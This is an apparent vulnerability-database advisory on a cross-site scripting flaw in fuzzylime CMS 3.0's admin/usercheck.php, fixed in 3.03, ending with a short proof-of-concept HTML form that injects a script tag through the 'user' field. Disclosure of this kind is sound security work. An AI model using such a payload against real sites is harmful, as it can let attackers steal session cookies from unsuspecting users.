fuzzylime (cms) 3.0 'usercheck.php' Cross Site Scripting Vulnerability
2014-07-01T00:00:00
ID: SSV:85691
Type: seebug
Reporter: Root
Modified: 2014-07-01T00:00:00
Description
No description provided by source.
source: http://www.securityfocus.com/bid/31306/info
fuzzylime (cms) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected site. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to fuzzylime (cms) 3.03 are vulnerable.
<form method="post" action="http://www.example.com/fuzzylime/admin/usercheck.php">
  <input type="hidden" name="log" value="in">
  <input type="text" name="user" value='"><script>alert(1)</script>'>
  <input type="submit">
</form>